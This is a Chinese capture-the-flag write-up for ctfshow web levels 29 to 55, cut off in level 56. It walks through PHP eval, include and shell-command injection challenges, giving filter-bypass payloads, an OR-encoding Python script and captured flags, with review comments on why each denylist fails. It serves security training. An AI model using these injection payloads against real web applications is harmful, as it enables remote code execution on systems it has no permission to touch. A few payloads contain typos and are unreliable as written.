web29

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// web29: a GET parameter is handed to eval() behind a single case-insensitive denylist.
error_reporting(0); // suppress all diagnostics, so a rejected or broken payload produces no error text
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): a regex denylist in front of eval() is not a security boundary — it
// rules out one substring and nothing else. The fix is to never evaluate user input.
if(!preg_match("/flag/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__); // no parameter given: print this file's own source
}

只过滤了flag(不区分大小写)

构造payload

?c=system("ls");
?c=system("tac f*");

拿到flag

ctfshow{6d1da9c5-aa80-41c1-aca0-6dfb3ec8a7ea}

web30

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// web30: same shape as web29, the denylist now rejects three substrings (flag, system, php).
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): blocking the name of one command-execution function leaves every other
// one (and the backtick operator) available; denylisting names cannot secure eval().
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

过滤了flag,system,php(不区分大小写)

system可用passthru或者echo(``)代替,

构造payload

?c=echo(`ls`);
?c=echo(`tac f*`);

拿到flag

ctfshow{a14dacd0-b579-4d77-a64f-1ddc760722c1}

web31

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// web31: the denylist grows to cover cat/sort/shell, '.', the space character and the single quote.
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): the literal " " alternative only matches an ASCII space; other
// whitespace bytes are not covered, and eval() is still reached for anything that passes.
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

过滤了flag,system,php,cat,sort,shell,.,空格,'(不区分大小写)

用%09(tab)代替空格,

构造payload

?c=echo(`ls`);
?c=echo(`tac%09f*`);

拿到flag

ctfshow{7cca93ab-0233-48d6-9534-ed516600e091}

web32

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// web32: adds the backtick, echo, ';' and '(' to the web31 denylist.
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): banning '(' and ';' does not remove language constructs such as
// include, which need neither; the last statement of eval()'d code needs no ';' either.
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

相比web31,额外过滤了`,echo,;,(

尝试使用文件包含绕过

?c=include$_GET[b]?>&b=data://text/plain,<?php system("ls");?>
?c=include$_GET[b]?>&b=data://text/plain,<?php system("tac flag.php");?>

得到flag

ctfshow{ee520f6e-ba0a-4c01-9411-05a02420baeb} 

web33

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
// web33: web32's list plus the double quote.
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): the filter only inspects $_GET['c']; any other request parameter the
// evaluated code reads is completely unchecked, which is why these lists keep failing.
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

一招鲜,吃遍天

构造payload

?c=include$_GET[b]?>&b=data://text/plain,<?php system("ls");?>
?c=include$_GET[b]?>&b=data://text/plain,<?php system("tac f*");?>

得到flag

ctfshow{078e0c80-b526-41ad-80a3-426b1faced5a}

web34

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

// web34: web33's list plus ':'.
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): still a substring denylist in front of eval(); see the note on web33 —
// only this one parameter is screened.
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

多禁了个:,没影响,一招鲜,吃遍天

?c=include$_GET[b]?>&b=data://text/plain,<?php system("ls");?>
?c=include$_GET[b]?>&b=data://text/plain,<?php system("tac f*");?>

得到flag

ctfshow{c6471ed6-6e2c-4103-8171-2d1d6298f9e3}

web35

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

// web35: web34's list plus '<' and '='.
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): denylist before eval(); the evaluated code can still read other,
// unscreened request parameters.
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

一招鲜,吃遍天

?c=include$_GET[b]?>&b=data://text/plian,<?= system("tac f*");?>

得到flag

ctfshow{9802f18a-bb60-45b7-b3e2-e72894a4f1b7}

web36

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

// web36: web35's list plus '/' and all ASCII digits.
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): banning digits in $c does nothing for digits (or anything else) carried
// in other parameters; the evaluated code is not restricted, only this string is.
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

多禁用了数字,一招鲜吃遍天

?c=include$_GET[b]?>&b=data://text/plain,<?= system("ls");?>
?c=include$_GET[b]?>&b=data://text/plain,<?= system("tac f*");?>

得到flag

ctfshow{ab182bac-0440-438a-9479-3a50e21354b6}

web37

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
// web37: the GET value is used as an include path, then $flag (expected to be set by
// the included file, per the comment above) is printed.
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): include() of a user-controlled path treats any readable file or stream
// wrapper as code. Resolve against a fixed directory/allowlist instead of a substring
// check, and keep allow_url_include off so data:// and similar wrappers are refused.
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag; // prints whatever the included file assigned, if anything

}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

从这开始就跟文件包含很像了

构造payload

?c=data://text/plain,<php= system("tac f*");?>

得到flag

ctfshow{25683191-dc1b-4628-8957-a54c4c633341}

web38

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
// web38: as web37, with "php" and "file" added to the denylist.
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): presumably aimed at the php:// and file:// wrappers, but include() accepts
// other wrappers too; an allowlist of resolved paths is the only reliable control.
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag; // prints whatever the included file assigned, if anything

}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

相比上题,额外过滤了php和file

构造payload

?c=data://text/plain,<?= system("tac f*");?>

得到flag

ctfshow{1d7d8f52-2253-40b7-826c-06b8d6d88800}

web39

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
// web39: the include path is the GET value with ".php" appended; nothing else is printed.
error_reporting(0); // hide diagnostics
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): a fixed suffix constrains the end of the path but not its scheme or
// prefix, so the wrapper-based inclusion from web37/38 is unaffected.
if(!preg_match("/flag/i", $c)){
include($c.".php");
}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

照样能用

?c=data://text/plain,<?= system("tac f*");?>

得到flag

ctfshow{a32ae679-0b72-47e4-b938-f04da301825c}

web40

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/


// web40: eval() behind a denylist of digits and most ASCII punctuation; no error_reporting(0) here.
if(isset($_GET['c'])){
$c = $_GET['c'];
// NOTE(review): letters are allowed, and PHP code made only of nested function calls
// with no literals is still valid, so eval() remains reachable. As transcribed here the
// pattern contains ASCII "\(|\)", which would reject the payloads in the write-up; the
// text says the challenge bans the full-width parentheses, so the transcription may have
// normalised them — verify against the original.
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

拿到题目,被过滤的东西有不少,仔细一看,之前能用的符号基本都被禁了,但再仔细一看还给留了一对(),禁用的是中文的(),这就需要我们采用各种函数构造payload

这里先记住一个payload

?c=eval(next(reset(get_defined_vars()));&1=system("ls");
?c=eval(next(reset(get_defined_vars()));&1=system("tac f*");

然后接着看这些函数的作用

eval()//代码执行
next()//这个函数将数组内部指针向前移动一位,并返回当前指针处的元素值。
reset()//这个函数将数组内部指针指向第一个元素,并返回该元素的值。
get_defined_vars()//这个函数返回当前所有已定义变量的数组,包括局部变量和全局变量。

第二种方法,比较容易理解

?c=highlight_file(next(array_reverse(scandir(getcwd()))));

分析为什么这么做

首先我们要看目录

使用

?c=print_r(scandir(getcwd()));

我们得到

Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )

这时候,我们使用翻转数组的函数array_reverse,数组就会变成

Array ( [0] => index.php [1] => flag.php [2] => .. [3] => . )

接下来就是读取[1]中的数据

使用next(),指向[1],再用highlight_file读取flag

但这个方法依赖flag文件在数组中的位置;如果它排在中间而不是第二位,就不容易取到,这个方法就不好用了

得到flag

ctfshow{b93dd03b-4a96-4443-932b-c298d5ba0f28}

web41

与或非绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date: 2020-09-05 20:31:22
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show

*/

// web41: the POST value is spliced into "echo(...)" and evaluated; letters, digits and most
// operators are denied, but '|', '"' and the parentheses are not.
if(isset($_POST['c'])){
$c = $_POST['c'];
// NOTE(review): string operators on quoted literals can assemble any byte sequence,
// so a character-class denylist does not bound what eval() sees.
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
eval("echo($c);");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}
?>

没有禁用|,借助脚本

import re
import urllib
from urllib import parse
import requests

# NOTE(review): indentation was lost when this script was pasted; the nesting is
# described by the comments but is not reconstructed here.
# Table of printable characters reachable as the bitwise OR of two bytes that each
# pass the web41 regex; every entry is [character, percent-encoded byte 1, percent-encoded byte 2].
contents = []

# Iterate over every pair of byte values 0x00..0xFF
for i in range(256):
for j in range(256):
# Render i and j as two-digit hex strings ('00'..'ff')
hex_i = '{:02x}'.format(i)
hex_j = '{:02x}'.format(j)

# Python mirror of the PHP denylist; compiled on every iteration (could be hoisted, left as-is)
preg = re.compile(r'[0-9]|[a-z]|\^|\+|~|\$|\[|]|\{|}|&|-', re.I)

# Skip the pair if either byte is itself a rejected character
if preg.search(chr(int(hex_i, 16))) or preg.search(chr(int(hex_j, 16))):
continue

# Percent-encode each byte (e.g. '%20' is a space)
a = '%' + hex_i
b = '%' + hex_j

# The character the server sees after OR-ing the two bytes
c = chr(int(a[1:], 16) | int(b[1:], 16))

# Keep only printable ASCII results (32..126)
if 32 <= ord(c) <= 126:
contents.append([c, a, b]) # character, its first encoding, its second encoding

# Encode a string as the OR of two percent-encoded strings, using the table above.
def make_payload(cmd: str) -> str:
payload1 = '' # first operand
payload2 = '' # second operand

# For each character of the command ...
for char in cmd:
# ... look up its entry in contents
for item in contents:
if char == item[0]: # entry found
payload1 += item[1] # append the first operand's encoding
payload2 += item[2] # append the second operand's encoding
break # stop at the first matching entry
# NOTE(review): a character with no entry is silently dropped; the caller is not told.

# Return ("...."|"....") so PHP evaluates the bitwise OR of the two strings
return '("' + payload1 + '"|"' + payload2 + '")'

# Read the target URL interactively
URL = input('url:')

# Build the payload: the encoded function name followed by its encoded argument
payload = make_payload('system') + make_payload('cat flag.php')

# POST the decoded bytes as parameter c; verify=False disables TLS certificate checking
response = requests.post(URL, data={'c': urllib.parse.unquote(payload)}, verify=False)

# Print the server's reply
print(response.text)

得到flag

ctfshow{fb643932-138c-459d-982c-1940774a9003}

web42

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web42: the GET value is concatenated into a shell command line with no check at all.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): the appended redirect only discards the output of the last simple
// command on the line; it does not constrain what runs. Use escapeshellarg() per
// argument or, better, avoid the shell entirely.
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

开始了新的一种

自动带了个system();我们只需要给c传命令语句就行了,

但后面带了个>/dev/null 2>&1,得想办法让它不影响语句

有很多种绕过方法,最简单的是在命令后面加;

或者加||,%0a等

这里构造payload

?c=ls;
?c= tac f*;

得到flag

ctfshow{538f23e2-488b-4087-a142-61ae3509ccd7}

web43

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web43: as web42, now rejecting ';' and "cat" before the shell call.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): ';' is only one of the shell's command separators; a denylist of
// separators cannot make string-built shell commands safe.
if(!preg_match("/\;|cat/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

相比上题,把;cat过滤了

我们使用||或%0a结尾,

构造payload

?c=ls%0a
?c=tac f*%0a

得到flag

ctfshow{e634303d-c8d5-4c77-8d5f-cf7df77a5da5}

web44

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web44: web43's list plus "flag".
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): blocking a file name as a substring is defeated by shell globbing,
// which expands on the server side after this check has run.
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

过滤了flag,用f*,fla?????代替

构造payload

?c=tac f*%0a

得到flag

ctfshow{fe5488e7-8429-4bbe-a324-58979c9b688b}

web45

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web45: web44's list plus the ASCII space.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): " " matches only the space byte; the shell treats other whitespace
// as a separator too, so the command line is still attacker-shaped.
if(!preg_match("/\;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

过滤了空格,用%09或者${IFS}代替,构造payload

?c=tac%09f*%0a

得到flag

ctfshow{e9c6696b-a4f0-4e09-bedc-52ebf8dae4f4}

web46

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web46: web45's list plus digits, '$' and '*'.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): $_GET is already URL-decoded, so the digit class sees decoded bytes,
// not the "%xx" text of the request; the check cannot reason about encodings it never sees.
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

看似是过滤了数字,实际上并不影响%0a,%09的使用,因为URL编码在过滤前已经被解码,过滤看到的是解码后的字节;过滤了*,就用?

构造payload

?c=tac%09fla?????%0a

得到flag

ctfshow{801863f2-cae8-4f4a-9f63-361f80e28622}

web47

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web47: web46's list plus the names of several file-reading commands.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): enumerating command names is open-ended; any binary on PATH that
// is not listed remains callable through the shell.
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

禁用了更多的命令

我们用不到

构造payload

?c=tac%09fla?????%0a

得到flag

ctfshow{e37e71b9-7e6c-4b70-803a-72b828cb38ff}

web48

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web48: web47's list plus sed/cut/awk/strings/od/curl and the backtick.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): same structural problem as web47 — a growing name list, still
// a string-built shell command underneath.
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

没啥影响,还是上一题的payload

?c=tac%09fla?????%0a

得到flag

ctfshow{b4d605ba-2643-4da1-ac1f-cd8db35f33fb}

web49

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:22:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web49: web48's list plus '%'.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): a literal '%' never survives URL decoding unless it was sent as "%25",
// so this alternative adds almost nothing; the decoded bytes are what the shell gets.
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

没啥影响啊,还是接着这样做

构造payload

?c=tac%09fla?????%0a

得到flag

ctfshow{034b29e1-fe7b-4366-8ea4-29340c5cc930}

web50

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web50: web49's list plus the tab (\x09) and '&' (\x26) bytes.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): '<' and '>' are still allowed here, so shell redirections remain
// available; the list chases individual bytes instead of removing the shell.
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

把%09禁用了,我们使用<

构造payload

?c=tac<fl%27%27ag.php||

得到flag

ctfshow{aa42bf15-c3ea-4416-a1db-8fc128ee1a3f}

web51

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:42:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web51: web50's list plus "tac".
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): one more reader name; see web47 — the set of programs that can
// print a file is not enumerable.
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

把tac给禁了,我们换一种,用nl

构造payload

?c=nl<fl%27%27ag.php||

在源代码中找到flag

ctfshow{1e67b744-e71e-4b6c-9b14-ccfe641388d8}

或者用另一个命令rev反向输出,最后把得到的flag翻转一下即可

web52

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:50:30
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web52: adds '>' and '<' to web51's list but drops the "\\$" alternative, so '$' is allowed again.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): with '$' permitted, shell parameter expansion is back in play;
// regressions like this are typical of hand-maintained denylists.
if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

把<给禁用了,但是没有禁$,那就用${IFS},

构造payload

?c=nl${IFS}fl%27%27ag.php||

结果发现


1 <?php
2
3 /*
4 # -*- coding: utf-8 -*-
5 # @Author: h1xa
6 # @Date: 2020-09-05 20:49:44
7 # @Last Modified by: h1xa
8 # @Last Modified time: 2020-09-05 20:49:53
9 # @email: h1xa@ctfer.com
10 # @link: https://ctfer.com
11
12 */
13
14
15 $flag="flag_here";

flag不在这个文件里

我们往上级的目录翻一翻

?c=ls${IFS}/||

在这里,我们看到了有一个flag文件夹,打开看看

?c=nl${IFS}/fla''g||

果然找到了flag

ctfshow{953e2696-21d2-4264-8511-f58e9a9f593c}

web53

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 18:21:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web53: same denylist family (plus "wget"), but the command is run without the
// trailing redirect and its result is echoed.
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
echo($c); // reflects the raw input into the page
$d = system($c); // system() writes the command's output itself and returns its last line
echo "<br>".$d; // so the last line is printed twice
}else{
echo 'no'; // explicit rejection message, unlike the earlier levels
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

就改了一下,结尾不用再加||了,构造payload

?c=rev${IFS}fla?????

得到翻转flag

}bccba0f9d27e-d499-0044-1d2d-40920210{wohsftc"=galf

web54

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:43:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// web54: the name alternatives become ".*c.*a.*t.*"-style subsequence patterns.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): ".*x.*y.*z.*" rejects any input containing x, y, z in that order
// anywhere in the string, not just the contiguous word — far stricter than web53 and
// prone to false positives, yet still a denylist in front of an unescaped shell call.
if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

这次是真正意义上的过滤,这些命令名完全用不了了,

用翻转读取

?c=rev${IFS}fla?????

得到翻转flag

}d05c4c51b088-914b-4fc4-6c3d-a609a5e0{wohsftc"=galf

web55

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 20:03:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Showing off, are you?
// web55: every ASCII letter is rejected (case-insensitively) before the shell call.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): digits, '.', '/', '?', '[' and ']' are still allowed, so shell
// glob patterns can name paths without spelling them; the shell is still reachable.
if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

过滤了字母,我们采用临时文件上传漏洞

先写一个文件上传网页

<!DOCTYPE html>
<!-- Minimal multipart/form-data upload form; the action is the address of the challenge instance. -->
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="https://62170708-6917-4055-af84-98fa1cea65aa.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!-- the link is the URL of the challenge currently open -->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>

使用时将网址改一下,上传一个txt文件,抓包,添加内容

:8080 //添加端口
?c=.%20/???/????????[@-[] //POST /后添加

得到响应

HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 05 Jul 2025 12:25:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.3.11
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Content-Type,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization,x-auth-token,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Max-Age: 1728000
Content-Length: 278

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-07 19:40:53
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// flag.php as returned in the response above; the value is specific to that challenge instance
$flag="ctfshow{d70c8c28-7f40-435b-a1c2-4ac398524812}";

得到flag

web56

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Showing off, are you?
// web56: web55's list plus digits, '$', '(', '{' and both quote characters.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): the write-up solves this the same way as web55, which shows the
// extra characters were not what the previous technique depended on.
if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
